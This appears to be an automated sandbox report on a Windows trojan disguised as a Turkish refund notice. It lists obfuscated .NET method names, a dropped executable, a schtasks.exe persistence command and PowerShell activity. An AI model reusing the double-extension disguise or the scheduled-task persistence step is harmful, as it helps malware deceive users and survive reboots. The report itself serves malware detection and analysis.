Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 1_2_010A46B8 push edx; iretd	1_2_010A46BA
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 1_2_010A46BF push edx; iretd	1_2_010A46C2
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 16_2_0267465B push edx; iretd	16_2_02674662
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 16_2_02674658 push edx; iretd	16_2_0267465A
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 16_2_026746BF push edx; iretd	16_2_026746C2
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 16_2_026746BB push edx; iretd	16_2_026746BE
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 16_2_026746B8 push edx; iretd	16_2_026746BA
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 16_2_026747B0 push esi; iretd	16_2_026747B2
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 20_2_02C30007 push 00300100h; ret	20_2_02C3001A
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 20_2_06A7C75D push es; ret	20_2_06A7C7C0

Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Static PE information: section name: .text entropy: 7.588327362841595
Source: SOFcFE.exe.1.dr	Static PE information: section name: .text entropy: 7.588327362841595

Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, wfmuxKccGtsDajMlAe.cs	High entropy of concatenated method names: 'OFNMeY08RZ', 'qooMTFRYAO', 'UmcYCeftjN', 'meTYGTXb3o', 'dJIM3tg1RY', 'Ef9MW42Y2M', 'G1aMhp6Cas', 'NfFMuVNOiC', 'SumMr7axBG', 'WvYMFlVHNg'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, qfVZ9t1fu6WDpyoTODH.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'eUbPuTJwP4', 'WxePr4Ic8Q', 'i2bPFK5HF9', 'ffjPOWNyJ0', 'qwgPHST8ek', 'AfUP0vHQMw', 'AAoPKXEXKf'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, AkvZU4WDIaFkxJmh7r.cs	High entropy of concatenated method names: 'QePDuVyYBW', 'Lw9DrmqQtw', 'wKEDFA9vFu', 'zYkDOuNZpA', 'dCgDHdo44y', 'xIsD0PiDAA', 'iubDK0pAvv', 'CpMDe7beF7', 'JgkDsAUS3x', 'vwDDT6gFh2'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, b2mCNG10iQkY19oTwYA.cs	High entropy of concatenated method names: 'jMqR1XVLKm', 'wM7RN6SktP', 'MMqRymU4gw', 'PXrRiLFSWo', 'TtpRIIxplk', 'kBvRxIJbHG', 'FM0RlyKDR9', 'UyJR4xSv43', 'iotRbCacGv', 'nYmRBUCcof'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, hLi8mXJ5Khswjlivkb.cs	High entropy of concatenated method names: 'BDm2f5ElpD', 'Oec2DZOLrN', 'JwY2kklVBd', 'StV2wJcW0B', 'HyM2LjlMfN', 'mfqkHDPnFP', 'iQwk0gp1ej', 'Xt0kKCUqd0', 'iouke22xIe', 'axskspvN6t'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, sfppKNqtuStwuHs2PL.cs	High entropy of concatenated method names: 'R6wRGVUWvx', 'uXyRnrmeHk', 'KTcRvJd7Xy', 'rXGRXKVMRt', 'lJNRDE8G5P', 'UnqRkcbxpX', 'sGmR26QG4K', 'nQhYKT1RNP', 'P2sYeyIuML', 'pMcYsvYI68'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, YuOfOPHITqDbKEIJ9U.cs	High entropy of concatenated method names: 'vb7yjt2D2', 'rjYisIsYe', 'uXXxXgLFa', 'BVhlStUG4', 'H9ObnC0r4', 'KqYBYCiST', 'lUNHhiQ80hpvqj4f6G', 'xrsCsvi5fXTpegWPi4', 'n1Xmbrd9GQ34gYhd0o', 'hYVYoCASH'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, gCmqqu34SWaskVT2xX.cs	High entropy of concatenated method names: 'QW8nfX3DxC', 'Y9RnXYgKYD', 'AVdnD9EfWE', 'DWunqKUuFe', 'simnkFs9u9', 'wyln2RUhyR', 'gvonwbsdwS', 'HGLnLcg8dG', 'yoAnEuHcmw', 'bdpnAsPPj2'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, fh0VDChk6xbBJVGHfn.cs	High entropy of concatenated method names: 'iGxg4Hke4k', 'FiUgbNodeP', 'zUCgmNidVO', 'YQQgcZI97h', 'xaTg7aj9vE', 'EeVgtQ4MAW', 'kIVgZUgmK4', 'riJgQiMMs0', 'jKegdIjXf1', 'HtUg3BktZR'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, xLgx0wL9epL6YDiocQ.cs	High entropy of concatenated method names: 'jijw1bKQoJ', 'jAOwNk9buI', 'hbGwyPoaEi', 'eKlwiXaajX', 'BdQwIjLBG0', 'cswwxavNfY', 'BUpwlenTGf', 'p8Dw4vxZZq', 'x0jwbHCCTj', 'tt9wBC898g'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, LLP85LTDBHgT5Iin7N.cs	High entropy of concatenated method names: 'mksqinZTmH', 'QSUqx4kNkL', 'XhTq47C0Iv', 'WCMqbPGT7G', 'E7yq8Gl6Td', 'Vx8qU7w6Tl', 'XAnqMkClux', 'LXjqYFarEi', 'u0SqRd8Gay', 'b1dqP88HOG'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, XPp2DtzlxtLiZfOYCO.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qMlRgeOvCP', 'nfsR8knFv7', 'kIARUGgUkq', 'HfcRMrkGoG', 'DdsRYp0gZG', 'gnaRR38phV', 'MO2RPMF3ub'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, RSYeSwYT0Sh5pRPAbT.cs	High entropy of concatenated method names: 'Dispose', 'zklGsPxsHV', 'g3CScc5bbG', 'QZKjj65YcT', 'WNTGT6enkE', 'KDiGzPePyZ', 'ProcessDialogKey', 'sYPSCeJLX8', 'sjySGgmnxr', 'LwlSSYtBuj'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, T47EeKuAlyHS1bEdGK.cs	High entropy of concatenated method names: 'wOLYm2MP6N', 'mZoYcl2U9u', 'jwaY5ldwFK', 'troY7IOgQi', 'x1kYu8NO7E', 'xHCYtiYIwN', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, IoII6EEbDCScbo28Np.cs	High entropy of concatenated method names: 'g4Q8diZUls', 'xEa8WnfNBc', 'Auk8uAyN8m', 'cZi8rxZVdv', 'J5l8cbUepV', 'M3185uaraa', 'jAc87pi2qS', 'X0Z8tolEnA', 'xqS8Jtrhoa', 'b748Z5aDhf'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, Sm0QWOUtRIVaGPnUQj.cs	High entropy of concatenated method names: 'CJkYXehmWF', 'QVLYD44ftN', 'GsuYqfj1N3', 'KkCYktqkTs', 'KDyY2fePJ2', 'zHVYw28hX3', 'ybOYLYp6Bl', 'JpUYEXbbH7', 'LDyYAwKZiI', 'neDY9pcyPZ'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, yx3eKTRD6e5DRY0EXd.cs	High entropy of concatenated method names: 'hvhMAgvqeq', 'AnbM9q6CNC', 'ToString', 'X6eMXTJoBL', 'OsWMD4GS0B', 'y2FMq6o0TZ', 'YVTMkIcK1b', 'RUhM2sjmOd', 'Hq4MwrkBi3', 'A2lMLiJrYN'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, OldAHhkVUFSgVhwLNN.cs	High entropy of concatenated method names: 'w9twXmWo2w', 'l6IwqehMMI', 'A6Sw2np7Av', 'cwS2TyoAE7', 'wTX2zSVA0e', 'zjawCtL0Bx', 'xbTwGDkWJZ', 'VD7wS7dJii', 'jP3wnU4eOG', 'OZlwvrGFLY'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, gyQy9mKk9Sj4qkfZTl.cs	High entropy of concatenated method names: 'jTSGw4nt4P', 'wdoGLj8pet', 'itjGAgZhm2', 'aKqG9ec997', 'LwXG8E5yE0', 'v3mGUY9MOi', 'GPEJ5kEdY0l3adFpK9', 'JauLGez7RxAu7idIcS', 'lUcGG4kXOL', 'KbhGnCwZeu'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, i9NgCZSWkgDvF746L2.cs	High entropy of concatenated method names: 'LENkIjuKTN', 'OafklcsJpk', 'a9Fq5eWQ3v', 'vdvq7ER0yp', 'c5xqtP0heT', 'Ts7qJCEbli', 'btwqZFplLy', 'W4IqQ7vJhC', 'WPRq6trck7', 'mI4qd3bwuS'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, lQiCylDbuWK8hAmcEC.cs	High entropy of concatenated method names: 'ToString', 'mOaU3YFUso', 'KCEUc0Y4bC', 'mfoU5wXYcy', 'onvU7YNIY5', 'tpuUt3Mlxi', 'YS6UJ8yXyH', 'dDmUZfBq9I', 'zvCUQURaJA', 'unRU6NVc1U'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, wfmuxKccGtsDajMlAe.cs	High entropy of concatenated method names: 'OFNMeY08RZ', 'qooMTFRYAO', 'UmcYCeftjN', 'meTYGTXb3o', 'dJIM3tg1RY', 'Ef9MW42Y2M', 'G1aMhp6Cas', 'NfFMuVNOiC', 'SumMr7axBG', 'WvYMFlVHNg'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, qfVZ9t1fu6WDpyoTODH.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'eUbPuTJwP4', 'WxePr4Ic8Q', 'i2bPFK5HF9', 'ffjPOWNyJ0', 'qwgPHST8ek', 'AfUP0vHQMw', 'AAoPKXEXKf'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, AkvZU4WDIaFkxJmh7r.cs	High entropy of concatenated method names: 'QePDuVyYBW', 'Lw9DrmqQtw', 'wKEDFA9vFu', 'zYkDOuNZpA', 'dCgDHdo44y', 'xIsD0PiDAA', 'iubDK0pAvv', 'CpMDe7beF7', 'JgkDsAUS3x', 'vwDDT6gFh2'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, b2mCNG10iQkY19oTwYA.cs	High entropy of concatenated method names: 'jMqR1XVLKm', 'wM7RN6SktP', 'MMqRymU4gw', 'PXrRiLFSWo', 'TtpRIIxplk', 'kBvRxIJbHG', 'FM0RlyKDR9', 'UyJR4xSv43', 'iotRbCacGv', 'nYmRBUCcof'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, hLi8mXJ5Khswjlivkb.cs	High entropy of concatenated method names: 'BDm2f5ElpD', 'Oec2DZOLrN', 'JwY2kklVBd', 'StV2wJcW0B', 'HyM2LjlMfN', 'mfqkHDPnFP', 'iQwk0gp1ej', 'Xt0kKCUqd0', 'iouke22xIe', 'axskspvN6t'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, sfppKNqtuStwuHs2PL.cs	High entropy of concatenated method names: 'R6wRGVUWvx', 'uXyRnrmeHk', 'KTcRvJd7Xy', 'rXGRXKVMRt', 'lJNRDE8G5P', 'UnqRkcbxpX', 'sGmR26QG4K', 'nQhYKT1RNP', 'P2sYeyIuML', 'pMcYsvYI68'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, YuOfOPHITqDbKEIJ9U.cs	High entropy of concatenated method names: 'vb7yjt2D2', 'rjYisIsYe', 'uXXxXgLFa', 'BVhlStUG4', 'H9ObnC0r4', 'KqYBYCiST', 'lUNHhiQ80hpvqj4f6G', 'xrsCsvi5fXTpegWPi4', 'n1Xmbrd9GQ34gYhd0o', 'hYVYoCASH'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, gCmqqu34SWaskVT2xX.cs	High entropy of concatenated method names: 'QW8nfX3DxC', 'Y9RnXYgKYD', 'AVdnD9EfWE', 'DWunqKUuFe', 'simnkFs9u9', 'wyln2RUhyR', 'gvonwbsdwS', 'HGLnLcg8dG', 'yoAnEuHcmw', 'bdpnAsPPj2'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, fh0VDChk6xbBJVGHfn.cs	High entropy of concatenated method names: 'iGxg4Hke4k', 'FiUgbNodeP', 'zUCgmNidVO', 'YQQgcZI97h', 'xaTg7aj9vE', 'EeVgtQ4MAW', 'kIVgZUgmK4', 'riJgQiMMs0', 'jKegdIjXf1', 'HtUg3BktZR'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, xLgx0wL9epL6YDiocQ.cs	High entropy of concatenated method names: 'jijw1bKQoJ', 'jAOwNk9buI', 'hbGwyPoaEi', 'eKlwiXaajX', 'BdQwIjLBG0', 'cswwxavNfY', 'BUpwlenTGf', 'p8Dw4vxZZq', 'x0jwbHCCTj', 'tt9wBC898g'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, LLP85LTDBHgT5Iin7N.cs	High entropy of concatenated method names: 'mksqinZTmH', 'QSUqx4kNkL', 'XhTq47C0Iv', 'WCMqbPGT7G', 'E7yq8Gl6Td', 'Vx8qU7w6Tl', 'XAnqMkClux', 'LXjqYFarEi', 'u0SqRd8Gay', 'b1dqP88HOG'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, XPp2DtzlxtLiZfOYCO.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qMlRgeOvCP', 'nfsR8knFv7', 'kIARUGgUkq', 'HfcRMrkGoG', 'DdsRYp0gZG', 'gnaRR38phV', 'MO2RPMF3ub'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, RSYeSwYT0Sh5pRPAbT.cs	High entropy of concatenated method names: 'Dispose', 'zklGsPxsHV', 'g3CScc5bbG', 'QZKjj65YcT', 'WNTGT6enkE', 'KDiGzPePyZ', 'ProcessDialogKey', 'sYPSCeJLX8', 'sjySGgmnxr', 'LwlSSYtBuj'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, T47EeKuAlyHS1bEdGK.cs	High entropy of concatenated method names: 'wOLYm2MP6N', 'mZoYcl2U9u', 'jwaY5ldwFK', 'troY7IOgQi', 'x1kYu8NO7E', 'xHCYtiYIwN', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, IoII6EEbDCScbo28Np.cs	High entropy of concatenated method names: 'g4Q8diZUls', 'xEa8WnfNBc', 'Auk8uAyN8m', 'cZi8rxZVdv', 'J5l8cbUepV', 'M3185uaraa', 'jAc87pi2qS', 'X0Z8tolEnA', 'xqS8Jtrhoa', 'b748Z5aDhf'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, Sm0QWOUtRIVaGPnUQj.cs	High entropy of concatenated method names: 'CJkYXehmWF', 'QVLYD44ftN', 'GsuYqfj1N3', 'KkCYktqkTs', 'KDyY2fePJ2', 'zHVYw28hX3', 'ybOYLYp6Bl', 'JpUYEXbbH7', 'LDyYAwKZiI', 'neDY9pcyPZ'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, yx3eKTRD6e5DRY0EXd.cs	High entropy of concatenated method names: 'hvhMAgvqeq', 'AnbM9q6CNC', 'ToString', 'X6eMXTJoBL', 'OsWMD4GS0B', 'y2FMq6o0TZ', 'YVTMkIcK1b', 'RUhM2sjmOd', 'Hq4MwrkBi3', 'A2lMLiJrYN'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, OldAHhkVUFSgVhwLNN.cs	High entropy of concatenated method names: 'w9twXmWo2w', 'l6IwqehMMI', 'A6Sw2np7Av', 'cwS2TyoAE7', 'wTX2zSVA0e', 'zjawCtL0Bx', 'xbTwGDkWJZ', 'VD7wS7dJii', 'jP3wnU4eOG', 'OZlwvrGFLY'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, gyQy9mKk9Sj4qkfZTl.cs	High entropy of concatenated method names: 'jTSGw4nt4P', 'wdoGLj8pet', 'itjGAgZhm2', 'aKqG9ec997', 'LwXG8E5yE0', 'v3mGUY9MOi', 'GPEJ5kEdY0l3adFpK9', 'JauLGez7RxAu7idIcS', 'lUcGG4kXOL', 'KbhGnCwZeu'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, i9NgCZSWkgDvF746L2.cs	High entropy of concatenated method names: 'LENkIjuKTN', 'OafklcsJpk', 'a9Fq5eWQ3v', 'vdvq7ER0yp', 'c5xqtP0heT', 'Ts7qJCEbli', 'btwqZFplLy', 'W4IqQ7vJhC', 'WPRq6trck7', 'mI4qd3bwuS'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, lQiCylDbuWK8hAmcEC.cs	High entropy of concatenated method names: 'ToString', 'mOaU3YFUso', 'KCEUc0Y4bC', 'mfoU5wXYcy', 'onvU7YNIY5', 'tpuUt3Mlxi', 'YS6UJ8yXyH', 'dDmUZfBq9I', 'zvCUQURaJA', 'unRU6NVc1U'

Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe

File created: C:\Users\user\AppData\Roaming\SOFcFE.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SOFcFE" /XML "C:\Users\user\AppData\Local\Temp\tmpF6B6.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
